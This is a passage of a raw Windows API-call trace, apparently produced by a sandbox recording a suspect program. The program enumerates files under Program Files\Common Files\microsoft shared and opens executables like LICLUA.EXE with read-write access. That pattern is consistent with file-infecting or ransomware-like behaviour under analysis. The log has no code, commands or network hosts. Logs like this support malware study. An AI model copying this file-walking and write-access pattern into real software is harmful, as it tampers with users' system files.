1 [0086.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0086.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82ef8 [0086.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x82ef8, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe") returned 67 [0086.223] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.223] GetLastError () returned 0x5 [0086.223] GetLastError () returned 0x5 [0086.223] SetLastError (dwErrCode=0x5) [0086.223] GetLastError () returned 0x5 [0086.223] SetLastError (dwErrCode=0x5) [0086.223] GetLastError () returned 0x5 [0086.223] SetLastError (dwErrCode=0x5) [0086.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82ef8 | out: hHeap=0x20000) returned 1 [0086.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0086.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0086.223] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.223] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.223] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x84, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8a408, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x84, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓ꘀ\x05⺊Ā")) returned 0 [0086.223] FindClose (in: hFindFile=0x782d0 | out: hFindFile=0x782d0) returned 1 [0086.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0086.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0086.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0086.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0086.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0086.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0086.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0086.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0086.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0086.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0086.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.224] AreFileApisANSI () returned 1 [0086.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16", lpUsedDefaultChar=0x0) returned 56 [0086.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0086.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0086.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0086.225] AreFileApisANSI () returned 1 [0086.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16") returned 56 [0086.225] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16" (normalized: "c:\\program files\\common files\\microsoft shared\\office16"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.225] GetLastError () returned 0x5 [0086.225] GetLastError () returned 0x5 [0086.225] SetLastError (dwErrCode=0x5) [0086.225] GetLastError () returned 0x5 [0086.225] SetLastError (dwErrCode=0x5) [0086.225] GetLastError () returned 0x5 [0086.225] SetLastError (dwErrCode=0x5) [0086.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.225] AreFileApisANSI () returned 1 [0086.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0086.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76200, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16") returned 56 [0086.225] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16" (normalized: "c:\\program files\\common files\\microsoft shared\\office16"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.225] GetLastError () returned 0x5 [0086.225] GetLastError () returned 0x5 [0086.225] SetLastError (dwErrCode=0x5) [0086.226] GetLastError () returned 0x5 [0086.226] SetLastError (dwErrCode=0x5) [0086.226] GetLastError () returned 0x5 [0086.226] SetLastError (dwErrCode=0x5) [0086.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0086.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0086.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0086.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8b078 [0086.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0086.226] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd99442a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0086.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0086.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0086.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0086.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68bd0 [0086.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0086.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0086.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0086.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0086.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0086.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0086.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68bd0 | out: hHeap=0x20000) returned 1 [0086.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0086.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0086.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0086.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0086.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0086.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0086.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0086.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.227] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78610 [0086.227] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9f60362, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.227] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9e7b530, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x58cd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICLUA.EXE", cAlternateFileName="")) returned 1 [0086.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0086.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0086.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0086.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0086.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0086.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0086.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0086.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0086.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0086.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0086.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0086.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0086.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0086.228] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.228] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.228] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.228] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0086.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.228] AreFileApisANSI () returned 1 [0086.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE", lpUsedDefaultChar=0x0) returned 67 [0086.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0086.228] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.228] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0086.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0086.229] AreFileApisANSI () returned 1 [0086.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0086.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82058 [0086.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x82058, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 67 [0086.229] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.230] GetFileType (hFile=0x424) returned 0x1 [0086.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82058 | out: hHeap=0x20000) returned 1 [0086.230] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0086.230] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0086.230] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0086.230] CloseHandle (hObject=0x424) returned 1 [0086.230] AreFileApisANSI () returned 1 [0086.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0086.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82568 [0086.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x82568, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 67 [0086.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.231] GetFileType (hFile=0x424) returned 0x1 [0086.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82568 | out: hHeap=0x20000) returned 1 [0086.231] CloseHandle (hObject=0x424) returned 1 [0086.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0086.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0086.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0086.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0086.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0086.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0086.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0086.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0086.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0086.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0086.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0086.231] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0086.232] HeapFree 